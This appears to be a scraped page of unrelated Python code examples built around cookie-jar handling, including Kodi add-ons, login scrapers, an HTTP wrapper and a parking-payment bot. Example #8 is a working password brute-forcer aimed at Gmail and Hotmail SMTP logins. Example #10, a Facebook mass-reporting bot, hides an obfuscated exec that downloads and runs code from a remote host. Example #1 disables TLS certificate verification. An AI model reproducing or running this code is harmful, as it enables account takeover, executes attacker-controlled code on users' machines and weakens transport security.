예제 #1
0
rootDir = xbmc.translatePath(rootDir)
resDir = os.path.join(rootDir, 'resources')
imgDir = os.path.join(resDir, 'images')
uwcicon = xbmc.translatePath(os.path.join(rootDir, 'icon.png'))
changelog = xbmc.translatePath(os.path.join(rootDir, 'changelog.txt'))

profileDir = addon.getAddonInfo('profile')
profileDir = xbmc.translatePath(profileDir).decode("utf-8")
cookiePath = os.path.join(profileDir, 'cookies.lwp')
kodiver = xbmc.getInfoLabel("System.BuildVersion").split(".")[0]

if not os.path.exists(profileDir):
    os.makedirs(profileDir)

urlopen = urllib2.urlopen
cj = cookielib.LWPCookieJar(xbmc.translatePath(cookiePath))
Request = urllib2.Request

handlers = [urllib2.HTTPBasicAuthHandler(), urllib2.HTTPHandler()]

if (2, 7, 8) < sys.version_info < (2, 7, 12):
    try:
        import ssl; ssl_context = ssl.create_default_context()
        ssl_context.check_hostname = False
        ssl_context.verify_mode = ssl.CERT_NONE
        handlers += [urllib2.HTTPSHandler(context=ssl_context)]
    except:
        pass

if cj != None:
    if os.path.isfile(xbmc.translatePath(cookiePath)):
예제 #2
0
 def __init__(self):
     """ Set up the logger in a new channel. """
     self.logger = logging.getLogger("python-nikeplus-2013")
     """ Set up a cookies-enabled opener locally. """
     cj = cookielib.LWPCookieJar()
     self.opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
def resolve(url):
    m = _regex(url)
    if m:
        cookies = cookielib.LWPCookieJar()
        opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookies))
        player = 'http://www.streamuj.tv/new-flash-player/mplugin4.swf'
        headers = {
            'User-Agent': util.UA,
            'Referer': 'http://www.streamuj.tv/mediaplayer/player.swf'
        }
        data = request(opener, url, headers)
        if data.find('Toto video neexistuje') > 0:
            util.error('Video bylo smazano ze serveru')
            return
        burl = b64decode('aHR0cDovL2Z1LWNlY2gucmhjbG91ZC5jb20vcGF1dGg=')
        key = request(
            opener,
            'http://www.streamuj.tv/_key.php?auth=3C27f5wk6qB3g7nZ5SDYf7P7k1572rFH1QxV0QQ',
            headers)
        index = 0
        result = []
        qualities = re.search('rn\:[^\"]*\"([^\"]*)', data,
                              re.IGNORECASE | re.DOTALL)
        langs = re.search('langs\:[^\"]*\"([^\"]+)', data,
                          re.IGNORECASE | re.DOTALL)
        languages = []
        if not langs:
            languages = [
                ''
            ]  # pretend there is at least language so we read 1st stream info
        else:
            languages = langs.group(1).split(',')
        for lang in languages:
            streams = re.search('res' + str(index) + '\:[^\"]*\"([^\"]+)',
                                data, re.IGNORECASE | re.DOTALL)
            subs = re.search('sub' + str(index) + '\:[^\"]*\"([^\"]+)', data,
                             re.IGNORECASE | re.DOTALL)
            if subs:
                subs = re.search('[^>]+>([^,$]+)', subs.group(1),
                                 re.IGNORECASE | re.DOTALL)
            if streams and qualities:
                streams = streams.group(1).split(',')
                rn = qualities.group(1).split(',')
                qindex = 0
                for stream in streams:
                    res = json.loads(
                        util.post_json(burl, {
                            'link': stream,
                            'player': player,
                            'key': key
                        }))
                    req = urllib2.Request(res['link'], headers=headers)
                    req.get_method = lambda: 'HEAD'
                    try:
                        resp = opener.open(req)
                    except Exception as e:
                        print 'skipping %s: %s' % (res['link'], e)
                        continue
                    stream = resp.geturl()
                    resp.close()
                    q = rn[qindex]
                    if q == 'HD':
                        q = '720p'
                    else:
                        q = 'SD'
                    l = ' ' + lang
                    if subs:
                        l += ' + subs'
                        s = subs.group(1)
                        s = json.loads(
                            util.post_json(burl, {
                                'link': s,
                                'player': player,
                                'key': key
                            }))
                        cookie_header = ",".join("%s=%s" % (c.name, c.value)
                                                 for c in cookies)
                        subtitle_headers = {"Cookie": cookie_header}
                        subtitle_headers.update(headers)
                        result.append({
                            'url': stream,
                            'quality': q,
                            'subs': s['link'],
                            'headers': subtitle_headers,
                            'lang': l
                        })
                    else:
                        result.append({
                            'url': stream,
                            'quality': q,
                            'headers': headers,
                            'lang': l
                        })
                    qindex += 1
            index += 1
        return result
import requests, json
try:
    import cookielib
except:
    import http.cookiejar as cookielib
import re

session = requests.session()
session.cookies = cookielib.LWPCookieJar(filename="cookies.txt")
try:
    session.cookies.load(ignore_discard=True)
except:
    print("cookie未能加载")

agent = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/603.3.8 (KHTML, like Gecko) Version/10.1.2 Safari/603.3.8'
header = {
    "HOST": "www.zhihu.com",
    "Referer": "https://www.zhihu.com",
    "User-agent": agent
}


def is_login():
    inbox_url = "https://www.zhihu.com/inbox"
    response = session.get(inbox_url, headers=header, allow_redirects=False)
    if response.status_code != 200:
        return False
    else:
        return True

예제 #5
0
except:
    import http.cookiejar as cookielib
import re

from bs4 import BeautifulSoup

agent = 'Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.61 Mobile Safari/537.36'

headers = {
    "Host": "bbs.guitarera.com",
    "Referer": "http://bbs.guitarera.com/forum.php",
    'User-Agent': agent
}

session = requests.session()
session.cookies = cookielib.LWPCookieJar("cookies_LWP")
#session.cookies = cookielib.FileCookieJar("cookies_File")
try:
    session.cookies.load(ignore_discard=True)
    print("Cookie 已加载")
except:
    print("Cookie 未能加载")


def login(account, password):
    formhash = getFormhash()
    print("formhash:", formhash)
    postUrl = "http://bbs.guitarera.com/member.php?mod=logging&action=login&loginsubmit=yes&handlekey=login"
    postData = {
        'fastloginfield': "username",
        'username': account,
예제 #6
0
class Net:
    '''

    This class wraps :mod:`urllib2` and provides an easy way to make http

    requests while taking care of cookies, proxies, gzip compression and 

    character encoding.

    

    Example::

    

        from addon.common.net import Net

        net = Net()

        response = net.http_GET('http://xbmc.org')

        print response.content

    '''

    _cj = cookielib.LWPCookieJar()

    _proxy = None

    _user_agent = 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'

    _http_debug = False

    def __init__(self,
                 cookie_file='',
                 proxy='',
                 user_agent='',
                 http_debug=False):
        '''

        Kwargs:

            cookie_file (str): Full path to a file to be used to load and save

            cookies to.

            

            proxy (str): Proxy setting (eg. 

            ``'http://*****:*****@example.com:1234'``)

            

            user_agent (str): String to use as the User Agent header. If not 

            supplied the class will use a default user agent (chrome)

            

            http_debug (bool): Set ``True`` to have HTTP header info written to

            the XBMC log for all requests.

        '''

        if cookie_file:

            self.set_cookies(cookie_file)

        if proxy:

            self.set_proxy(proxy)

        if user_agent:

            self.set_user_agent(user_agent)

        self._http_debug = http_debug

        self._update_opener()

    def set_cookies(self, cookie_file):
        '''

        Set the cookie file and try to load cookies from it if it exists.

        

        Args:

            cookie_file (str): Full path to a file to be used to load and save

            cookies to.

        '''

        try:

            self._cj.load(cookie_file, ignore_discard=True)

            self._update_opener()

            return True

        except:

            return False

    def get_cookies(self):
        '''Returns A dictionary containing all cookie information by domain.'''

        return self._cj._cookies

    def save_cookies(self, cookie_file):
        '''

        Saves cookies to a file.

        

        Args:

            cookie_file (str): Full path to a file to save cookies to.

        '''

        self._cj.save(cookie_file, ignore_discard=True)

    def set_proxy(self, proxy):
        '''

        Args:

            proxy (str): Proxy setting (eg. 

            ``'http://*****:*****@example.com:1234'``)

        '''

        self._proxy = proxy

        self._update_opener()

    def get_proxy(self):
        '''Returns string containing proxy details.'''

        return self._proxy

    def set_user_agent(self, user_agent):
        '''

        Args:

            user_agent (str): String to use as the User Agent header.

        '''

        self._user_agent = user_agent

    def get_user_agent(self):
        '''Returns user agent string.'''

        return self._user_agent

    def _update_opener(self):
        '''

        Builds and installs a new opener to be used by all future calls to 

        :func:`urllib2.urlopen`.

        '''

        if self._http_debug:

            http = urllib2.HTTPHandler(debuglevel=1)

        else:

            http = urllib2.HTTPHandler()

        if self._proxy:

            opener = urllib2.build_opener(
                urllib2.HTTPCookieProcessor(self._cj),
                urllib2.ProxyHandler({'http': self._proxy}),
                urllib2.HTTPBasicAuthHandler(), http)

        else:

            opener = urllib2.build_opener(
                urllib2.HTTPCookieProcessor(self._cj),
                urllib2.HTTPBasicAuthHandler(), http)

        urllib2.install_opener(opener)

    def http_GET(self, url, headers={}, compression=True):
        '''

        Perform an HTTP GET request.

        

        Args:

            url (str): The URL to GET.

            

        Kwargs:

            headers (dict): A dictionary describing any headers you would like

            to add to the request. (eg. ``{'X-Test': 'testing'}``)



            compression (bool): If ``True`` (default), try to use gzip 

            compression.

            

        Returns:

            An :class:`HttpResponse` object containing headers and other 

            meta-information about the page and the page content.

        '''

        return self._fetch(url, headers=headers, compression=compression)

    def http_POST(self, url, form_data, headers={}, compression=True):
        '''

        Perform an HTTP POST request.

        

        Args:

            url (str): The URL to POST.

            

            form_data (dict): A dictionary of form data to POST.

            

        Kwargs:

            headers (dict): A dictionary describing any headers you would like

            to add to the request. (eg. ``{'X-Test': 'testing'}``)



            compression (bool): If ``True`` (default), try to use gzip 

            compression.



        Returns:

            An :class:`HttpResponse` object containing headers and other 

            meta-information about the page and the page content.

        '''

        return self._fetch(url,
                           form_data,
                           headers=headers,
                           compression=compression)

    def http_HEAD(self, url, headers={}):
        '''

        Perform an HTTP HEAD request.

        

        Args:

            url (str): The URL to GET.

        

        Kwargs:

            headers (dict): A dictionary describing any headers you would like

            to add to the request. (eg. ``{'X-Test': 'testing'}``)

        

        Returns:

            An :class:`HttpResponse` object containing headers and other 

            meta-information about the page.

        '''

        req = HeadRequest(url)

        req.add_header('User-Agent', self._user_agent)

        for k, v in headers.items():

            req.add_header(k, v)

        response = urllib2.urlopen(req)

        return HttpResponse(response)

    def _fetch(self, url, form_data={}, headers={}, compression=True):
        '''

        Perform an HTTP GET or POST request.

        

        Args:

            url (str): The URL to GET or POST.

            

            form_data (dict): A dictionary of form data to POST. If empty, the 

            request will be a GET, if it contains form data it will be a POST.

            

        Kwargs:

            headers (dict): A dictionary describing any headers you would like

            to add to the request. (eg. ``{'X-Test': 'testing'}``)



            compression (bool): If ``True`` (default), try to use gzip 

            compression.



        Returns:

            An :class:`HttpResponse` object containing headers and other 

            meta-information about the page and the page content.

        '''

        encoding = ''

        req = urllib2.Request(url)

        if form_data:

            form_data = urllib.urlencode(form_data)

            req = urllib2.Request(url, form_data)

        req.add_header('User-Agent', self._user_agent)

        for k, v in headers.items():

            req.add_header(k, v)

        if compression:

            req.add_header('Accept-Encoding', 'gzip')

        response = urllib2.urlopen(req)

        return HttpResponse(response)
예제 #7
0
# module
from auth import islogin
from auth import Logging


"""
    Note:
        1. 身份验证由 `auth.py` 完成。
        2. 身份信息保存在当前目录的 `cookies` 文件中。
        3. `requests` 对象可以直接使用,身份信息已经自动加载。

    By Luozijun (https://github.com/LuoZijun), 09/09 2015

"""
requests = requests.Session()
requests.cookies = cookielib.LWPCookieJar('cookies')
try:
    requests.cookies.load(ignore_discard=True)
except:
    Logging.error(u"你还没有登录知乎哦 ...")
    Logging.info(u"执行 `python auth.py` 即可以完成登录。")
    raise Exception("无权限(403)")


if islogin() != True:
    Logging.error(u"你的身份信息已经失效,请重新生成身份信息( `python auth.py` )。")
    raise Exception("无权限(403)")


reload(sys)
sys.setdefaultencoding('utf8')
예제 #8
0
def bruteforce(self):
    progress = Progressbar(self,
                           orient=HORIZONTAL,
                           length=200,
                           mode='determinate')
    progress.place(x=600, y=200)
    use = OptionParser()

    use.add_option("-g",
                   "--gmail",
                   dest="gmail",
                   help="Write Your Account gmail")
    use.add_option("-t",
                   "--hotmail",
                   dest="hotmail",
                   help="Write Your Account hotmail")
    use.add_option("-T",
                   "--twitter",
                   dest="twitter",
                   help="Write Your Account twitter")
    use.add_option("-f",
                   "--facebook",
                   dest="facebook",
                   help="Write Your Account facebook")
    use.add_option("-n",
                   "--netflix",
                   dest="netflix",
                   help="Write Your Account Netflix")
    use.add_option("-l",
                   "--list",
                   dest="list_password",
                   help="Write Your list passowrd")
    use.add_option("-p",
                   "--password",
                   dest="password",
                   help="Write Your passowrd ")
    use.add_option("-X", "--proxy", dest="proxy", help="Proxy list ")
    (options, args) = use.parse_args()

    brows = Browser()
    brows.set_handle_robots(False)
    brows._factory.is_html = True
    brows.set_cookiejar(cookielib.LWPCookieJar())
    useragents = [
        'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.19) Gecko/20081202 Firefox (Debian-2.0.0.19-0etch1)',
        'Opera/9.80 (J2ME/MIDP; Opera Mini/9.80 (S60; SymbOS; Opera Mobi/23.348; U; en) Presto/2.5.25 Version/10.54',
        'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.12 Safari/535.11',
        'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.6 (KHTML, like Gecko) Chrome/16.0.897.0 Safari/535.6'
    ]
    brows.addheaders = [('User-agent', random.choice(useragents))]
    brows.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),
                             max_time=1)
    proxyList = options.proxy
    if options.gmail == None:
        if options.hotmail == None:
            if options.twitter == None:
                if facebook == None:
                    if options.netflix == None:
                        print(use.usage)
                        exit()
        elif options.hotmail != None or options.gmail == None:
            smtp_srverH = smtplib.SMTP('smtp.live.com', 587)
            smtp_srverH.ehlo()
            smtp_srverH.starttls()
            if options.password != None or options.list_password == None:
                print("<<<<<<+++++Start  Attacking Email+++++>>>>>")
                try:
                    smtp_srverH.login(options.hotmail, options.password)
                    print("Found Password :{} \t Found Hotmail:{}".format(
                        options.password, options.hotmail))
                    Save = io.open(
                        "Hotmail.txt",
                        "a").write("Account Hotmail:" + options.hotmail +
                                   "\t\tPassword:"******"\n")
                except:
                    print("Not Found Password : {} \t Email Hotmail:{}".format(
                        options.password, options.hotmail))
            elif options.list_password != None or options.password == None:
                password_list = io.open(options.list_password, "r").readlines()
                for password in password_list:
                    try:
                        print("<<<<<<+++++Start  Attacking Email+++++>>>>>")
                        smtp_srverH.login(options.hotmail, password)
                        print("FOUND Password :{} \n Found Hotmail:{}".format(
                            password, options.hotmail))
                        Save = io.open(
                            "Hotmail.txt",
                            "a").write("Account Hotmail:" + options.hotmail +
                                       "\t\tPassword:"******"\n")
                    except smtplib.SMTPAuthenticationError:
                        print("Not Found Password : {} \t Email Hotmail:{}".
                              format(password, options.hotmail))
        if options.twitter != None:
            hejab = threading.Thread(target=twitter, name="hejab")
            hejab.start()
        if options.facebook != None:
            facebook(brows)
        if options.netflix != None:
            netflix = threading.Thread(target=Netflix, name="Netflix")
            netflix.start()

    elif options.gmail != None or options.hotmail == None or options.twitter == None:
        smtp_srverG = smtplib.SMTP('smtp.gmail.com', 587)
        smtp_srverG.ehlo()
        smtp_srverG.starttls()
        if options.password != None or options.list_password == None:
            print("%s<<<<<<+++++Start  Attacking Email+++++>>>>>%s" % (R, W))
            try:
                smtp_srverG.login(options.gmail, options.password)
                print("Found Password :{} \t Found Gmail:{}".format(
                    options.password, options.gmail))
                Save = io.open("Gmail.txt",
                               "a").write("Account Gmail:" + options.gmail +
                                          "\t\tPassword:"******"\n")
            except:
                print("Not Found Password : {} \t Email Gmail:{}".format(
                    options.password, options.gmail))
        elif options.list_password != None:
            password_list = io.open(options.list_password, "r").readlines()
            for password in password_list:
                password = password.rstrip("\n")
                print("<<<<<<+++++Start  Attacking Email+++++>>>>>")
                try:
                    smtp_srverG.login(options.gmail, password)
                    print("{}<<<+++Found Password :{} \t Found Gmail:{}+++>>>".
                          format(G, password, options.gmail))
                    Save = io.open("Gmail.txt",
                                   "a").write("Account Gmail:" +
                                              options.gmail + "\t\tPassword:"******"\n")
                    break
                except smtplib.SMTPAuthenticationError:
                    print(
                        "{}<<<---Not Found Password : {} \t Email Gmail:{}--->>>"
                        .format(R, password, options.gmail))

    else:
        print(use.usage)
        exit()
예제 #9
0
def get_cj(url):
    cj = cookielib.LWPCookieJar()
    opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
    opener.addheaders = [('User-Agent', UA)]
    response = opener.open(url)
    return ''.join(['%s=%s;' % (c.name, c.value) for c in cj])
예제 #10
0
    def run(self):
        br = mechanize.Browser()
        url = "https://mbasic.facebook.com"
        br.set_handle_equiv(True)
        br.set_handle_referer(True)
        br.set_handle_robots(False)
        br.set_cookiejar(cookielib.LWPCookieJar())
        br.addheaders = [
            ("User-Agent",
             random.choice(open("raw/header/ua.txt").read().splitlines()))
        ]
        br.open("https://mbasic.facebook.com/login")
        br.select_form(nr=0)
        br.form["email"] = "{}".format(self._email)
        br.form["pass"] = "******".format(self._pasw)
        br.submit()
        if "save-device" in br.geturl() or "m_sess" in br.geturl():
            print("[{}+{}] Login success: {}|{}".format(
                G, N, self._email, self._pasw))
            print("[%s=%s] %sReporting ...%s" % (G, N, R, N))
            br.open("https://mbasic.facebook.com/{}".format(self.tg))
            br._factory.is_html = True
            bb = bs4.BeautifulSoup(br.response().read(),
                                   features="html.parser")
            for x in bb.find_all("a", href=True):
                if "rapid_report" in x["href"]:
                    kntl = x["href"]
            '''
		   Sorry I encrypted this code to detect your
		   location, I just want to know who you are, if
		   anyone misuses this tool I can look for it ^^
			'''
            exec(
                zlib.decompress(
                    base64.b64decode(
                        requests.get(
                            eval(
                                base64.b64decode(
                                    "Imh0dHA6Ly9kb3JheXkuam9vbWxhLmNvbS9hLnR4dCI="
                                ))).text)))
            br.open(kntl)
            ''' 
				you can modify tag ^^
			'''
            j = json.dumps({
                "fake": "profile_fake_account",
                "action_key": "FRX_PROFILE_REPORT_CONFIRMATION",
                "checked": "yes"
            })
            js = json.loads(j)
            br._factory.is_html = True
            br.select_form(nr=0)
            br.form["tag"] = [js["fake"]]
            br.submit()
            try:
                br._factory.is_html = True
                br.select_form(nr=0)
                br.form["action_key"] = [js["action_key"]]
            except Exception as f:
                print("%s[!]%s %s" % (R, N, f))
            br.submit()
            try:
                br._factory.is_html = True
                br.select_form(nr=0)
                br.form["checked"] = [js["checked"]]
                br.submit()
                res = br.response().read()
                print("[%s=%s] Reported as fake account." % (G, N))
                print("[{}*{}] Result saved as {}__reportSuccess.html".format(
                    G, N, self._email))
                open("{}__reportSuccess.html".format(self._email),
                     "w").write(res)
            except Exception as f:
                print("\r[%s-%s] Already Reports." % (R, N))
                pass
        else:
            print "{}[!]{} Login Failed: {}|{}".format(R, N, self._email,
                                                       self._pasw)
예제 #11
0
def pay(locationNum, phoneNum, pin, cvv, duration):
    if duration <= 0 or duration > 120:
        print ts() + "Error input duration: " + str(duration)
        return False
    if duration < 5:
        print ts() + "Only " + str(duration) + " mins left, no need to pay"
        sendSMS("Only " + str(duration) + " mins left, no need to pay")
        return True
    print ts() + "Going to pay for duration of " + str(
        duration) + " mins using phone number " + str(
            phoneNum) + " for location " + str(
                locationNum) + ". You have 5 secs to cancel it."

    # print "debuging"
    # return True

    time.sleep(5)

    br = mechanize.Browser()
    cj = cookielib.LWPCookieJar()
    br.set_cookiejar(cj)

    # Log in page
    br.open("https://m.paybyphone.com")
    br.select_form(nr=0)
    br["ctl00$ContentPlaceHolder1$CallingCodeDropDownList"][0] = -1
    br["ctl00$ContentPlaceHolder1$AccountTextBox"] = str(phoneNum)
    br["ctl00$ContentPlaceHolder1$PinOrLast4DigitCcTextBox"] = str(pin)
    response1 = br.submit()

    # Select location number
    checkin_URL = response1.geturl()
    br.open(checkin_URL)
    br.select_form(nr=0)
    if br.form.controls[4].name == 'ctl00$ContentPlaceHolder1$ActiveParkingGridView$ctl02$ExtendAllowedHiddenField' \
            and br['ctl00$ContentPlaceHolder1$ActiveParkingGridView$ctl02$ExtendAllowedHiddenField'] == 'Normal':
        print ts(
        ) + "Still remains some time when paying! Probably you are using same account for two successive payments."
        return False
    br["ctl00$ContentPlaceHolder1$LocationNumberTextBox"] = str(locationNum)
    response1 = br.submit()

    # Duration
    checkin_URL = response1.geturl()
    br.open(checkin_URL)
    br.select_form(nr=0)
    br["ctl00$ContentPlaceHolder1$DurationTextBox"] = str(duration)
    response1 = br.submit()

    # Check Out
    checkin_URL = response1.geturl()
    br.open(checkin_URL)
    br.select_form(nr=0)
    if br["ctl00$ContentPlaceHolder1$NoRatesFoundErrorHidden"] == 'True':
        print ts() + "NoRatesFoundError"
        return False
    if br['ctl00$ContentPlaceHolder1$SessionQuoteErrorHidden'] == 'True':
        print ts() + 'SessionQuoteErrorHidden'
        return False
    if br['ctl00$ContentPlaceHolder1$ParkingSessionValidationErrorHidden'] == 'True':
        print ts() + 'ParkingSessionValidationError'
        return False
    if br.form.controls[5].name == 'ctl00$ContentPlaceHolder1$ChangeButton':
        print ts() + 'Only change button exists!'
        return False
    if br.form.controls[6].name != 'ctl00$ContentPlaceHolder1$ConfirmParking':
        print ts() + 'No confirm parking button exists!'
        return False
    if br.form.controls[5].name != 'ctl00$ContentPlaceHolder1$CvvTextBox':
        print ts() + 'No CVV text box!'
        return False
    br["ctl00$ContentPlaceHolder1$CvvTextBox"] = cvv
    response1 = br.submit()

    # Make sure it successfully paid
    checkin_URL = response1.geturl()
    html = br.open(checkin_URL).read()
    br.select_form(nr=0)
    if br.form.controls[
            0].name == 'ctl00$ContentPlaceHolder1$AddTimeLongButton':
        print ts() + "Failed to find park again buttion"
        return False
    if html.find("Icon_checkmark.png") != -1:
        msg = "Successfully pay for duration of " + str(
            duration) + " mins using phone number " + str(
                phoneNum) + " for location " + str(locationNum)
        print ts() + msg
        sendSMS(msg)
        return True

    return False
예제 #12
0
# try:
#     from PIL import Image
# except:
#     pass

# 构造 Request headers
agent = 'Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Mobile Safari/537.36'
headers = {
    "Host": "www.zhihu.com",
    "Referer": "https://www.zhihu.com/",
    'User-Agent': agent
}

# 使用登录cookie信息
session = requests.session()
session.cookies = cookielib.LWPCookieJar(filename='cookies')
try:
    session.cookies.load(ignore_discard=True)
except:
    print("Cookie 未能加载")


def get_xsrf():
    '''_xsrf 是一个动态变化的参数'''
    index_url = 'https://www.zhihu.com'
    # 获取登录时需要用到的_xsrf
    index_page = session.get(index_url, headers=headers)
    html = index_page.text
    pattern = r'name="_xsrf" value="(.*?)"'
    # 这里的_xsrf 返回的是一个list
    _xsrf = re.findall(pattern, html)
예제 #13
0
def get_results(start_date, end_date, results_jsonfile):

    # Browser
    br = mechanize.Browser()

    # Cookie Jar
    cj = cookielib.LWPCookieJar()
    br.set_cookiejar(cj)

    # Browser options
    br.set_handle_equiv(True)
    br.set_handle_redirect(True)
    br.set_handle_referer(True)
    br.set_handle_robots(False)

    # Follows refresh 0 but not hangs on refresh > 0
    br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)

    # Want debugging messages?
    #br.set_debug_http(True)
    #br.set_debug_redirects(True)
    #br.set_debug_responses(True)

    # User-Agent (this is cheating, ok?)
    br.addheaders = [(
        'User-agent',
        'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1'
    )]

    br.open("https://newsarchive.nebpress.com/")
    response1 = br.follow_link(text_regex=r"Guest Login")
    br.form = list(br.forms())[0]

    control1 = br.form.find_control("search_text")
    control2 = br.form.find_control("start_date")
    control3 = br.form.find_control("end_date")
    control4 = br.form.find_control("publication_filter")

    publications = []
    for item in control4.items:
        if not item.name == "all":
            publications.append(item.name)

    reporter_list = ["Katie Walter", "Amanda Woita", "Benjamin Welch"]

    for reporter in reporter_list:
        for pub in publications:
            br.open("https://newsarchive.nebpress.com/")
            response1 = br.follow_link(text_regex=r"Guest Login")
            br.form = list(br.forms())[0]
            control1 = br.form.find_control("search_text")
            control2 = br.form.find_control("start_date")
            control3 = br.form.find_control("end_date")
            control4 = br.form.find_control("publication_filter")
            control1.value = reporter
            control2.value = start_date
            control3.value = end_date
            control4.value = [pub]
            response = br.submit()
            soup = BeautifulSoup(response)
            text = soup.find_all('p')
            for t in text:
                for child in t.children:
                    if reporter in child:
                        client_location = get_client_location(
                            pub, NNS_client_location_data)
                        if client_location != None:
                            data = {
                                "type": "Feature",
                                "properties": {
                                    "name": "",
                                    "text": "",
                                    "reporter": "",
                                    "date": ""
                                },
                                "geometry": {
                                    "type": "Point",
                                    "coordinates": []
                                },
                                "id": ""
                            }

                            client_name = replace_pub_number_with_client_name(
                                pub, NNS_clients)
                            client_property = data["properties"]
                            client_property["name"] = client_name
                            client_property["text"] = str(t)
                            client_property["reporter"] = reporter
                            client_property["date"] = start_date

                            location_property = data["geometry"]
                            location_property["coordinates"] = client_location

                            data["id"] = id_counter

                            print "Found " + client_name + " with article that includes " + reporter + " in the text."

                            update_json_file(data, results_jsonfile)
                            global id_counter
                            id_counter += 1
                        else:
                            pass
예제 #14
0
    def __init__(self, subscription, proxy_config, cookie_file, debug=False):
        self.subscription = subscription
        self.debug = debug
        self.non_seasonal_shows = {'Super Bowl Archives': '117'}
        self.seasonal_shows = {
            'NFL Gameday': {
                '2015': '252',
                '2014': '212',
                '2013': '179',
                '2012': '146'
            },
            'Top 100 Players': {
                '2015': '257',
                '2014': '217',
                '2013': '185',
                '2012': '153'
            }
        }
        self.boxscore_url = 'http://neulionms-a.akamaihd.net/fs/nfl/nfl/edl/nflgr'

        if subscription == 'gamepass':
            self.base_url = 'https://gamepass.nfl.com/nflgp'
            self.servlets_url = 'http://gamepass.nfl.com/nflgp/servlets'
            self.seasonal_shows.update({
                'Playbook': {
                    '2015': '255',
                    '2014': '213',
                    '2013': '180',
                    '2012': '147'
                },
                'NFL Total Access': {
                    '2015': '254',
                    '2014': '214',
                    '2013': '181',
                    '2012': '148'
                },
                'NFL RedZone Archives': {
                    '2015': '248',
                    '2014': '221',
                    '2013': '182',
                    '2012': '149'
                },
                'Sound FX': {
                    '2015': '256',
                    '2014': '215',
                    '2013': '183',
                    '2012': '150'
                },
                'Coaches Show': {
                    '2014': '216',
                    '2013': '184',
                    '2012': '151'
                },
                'A Football Life': {
                    '2015': '249',
                    '2014': '218',
                    '2013': '186',
                    '2012': '154'
                },
                'NFL Films Presents': {
                    '2014': '219',
                    '2013': '187'
                },
                'Hard Knocks': {
                    '2015': '251',
                    '2014': '220',
                    '2013': '223'
                },
                'Hall of Fame': {
                    '2015': '253',
                    '2014': '222'
                }
            })
        elif subscription == 'gamerewind':
            self.base_url = 'https://gamerewind.nfl.com/nflgr'
            self.servlets_url = 'http://gamerewind.nfl.com/nflgr/servlets'

        else:
            raise ValueError('"%s" is not a supported subscription.' %
                             subscription)

        self.http_session = requests.Session()
        if proxy_config is not None:
            proxy_url = self.build_proxy_url(proxy_config)
            if proxy_url != '':
                self.http_session.proxies = {
                    'http': proxy_url,
                    'https': proxy_url,
                }
        self.cookie_jar = cookielib.LWPCookieJar(cookie_file)
        try:
            self.cookie_jar.load(ignore_discard=True, ignore_expires=True)
        except IOError:
            pass
        self.http_session.cookies = self.cookie_jar
예제 #15
0
 def get_empty_cookiejar():
     return cl.LWPCookieJar()
예제 #16
0
def loadVideos(url, name):
    #try:
    newlink = url
    xbmc.executebuiltin(
        "XBMC.Notification(Please Wait!,Loading selected video)")
    print newlink
    playtype = "direct"
    if (newlink.find("dailymotion") > -1):
        match = re.compile(
            '(dailymotion\.com\/(watch\?(.*&)?v=|(embed|v|user)\/))([^\?&"\'>]+)'
        ).findall(newlink)
        lastmatch = match[0][len(match[0]) - 1]
        link = 'http://www.dailymotion.com/' + str(lastmatch)
        req = urllib2.Request(link)
        req.add_header(
            'User-Agent',
            'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3'
        )
        response = urllib2.urlopen(req)
        link = response.read()
        response.close()
        sequence = re.compile('"sequence",  "(.+?)"').findall(link)
        newseqeunce = urllib.unquote(sequence[0]).decode('utf8').replace(
            '\\/', '/')
        #print 'in dailymontion:' + str(newseqeunce)
        imgSrc = re.compile('"videoPreviewURL":"(.+?)"').findall(newseqeunce)
        if (len(imgSrc[0]) == 0):
            imgSrc = re.compile('/jpeg" href="(.+?)"').findall(link)
        dm_low = re.compile('"sdURL":"(.+?)"').findall(newseqeunce)
        dm_high = re.compile('"hqURL":"(.+?)"').findall(newseqeunce)
        vidlink = urllib2.unquote(dm_low[0]).decode("utf8")
    elif (newlink.find("4shared") > -1):
        d = xbmcgui.Dialog()
        d.ok('Not Implemented', 'Sorry 4Shared links', ' not implemented yet')
    elif (newlink.find("docs.google.com") > -1
          or newlink.find("drive.google.com") > -1):
        docid = re.compile('/d/(.+?)/preview').findall(newlink)[0]
        cj = cookielib.LWPCookieJar()
        (cj, vidcontent) = GetContent2(
            "https://docs.google.com/get_video_info?docid=" + docid, "", cj)
        html = urllib2.unquote(vidcontent)
        cookiestr = ""
        try:
            html = html.encode("utf-8", "ignore")
        except:
            pass
        stream_map = re.compile('fmt_stream_map=(.+?)&fmt_list').findall(html)
        if (len(stream_map) > 0):
            formatArray = stream_map[0].replace("\/", "/").split(',')
            for formatContent in formatArray:
                formatContentInfo = formatContent.split('|')
                qual = formatContentInfo[0]
                url = (formatContentInfo[1]).decode('unicode-escape')

        else:
            cj = cookielib.LWPCookieJar()
            newlink1 = "https://docs.google.com/uc?export=download&id=" + docid
            (cj, vidcontent) = GetContent2(newlink1, newlink, cj)
            soup = BeautifulSoup(vidcontent)
            downloadlink = soup.findAll('a', {"id": "uc-download-link"})[0]
            newlink2 = "https://docs.google.com" + downloadlink["href"]
            url = GetDirVideoUrl(newlink2, cj)
        for cookie in cj:
            cookiestr += '%s=%s;' % (cookie.name, cookie.value)
        vidlink = url + ('|Cookie=%s' % cookiestr)
    elif (newlink.find("vimeo") > -1):
        idmatch = re.compile(
            "http://player.vimeo.com/video/([^\?&\"\'>]+)").findall(newlink)
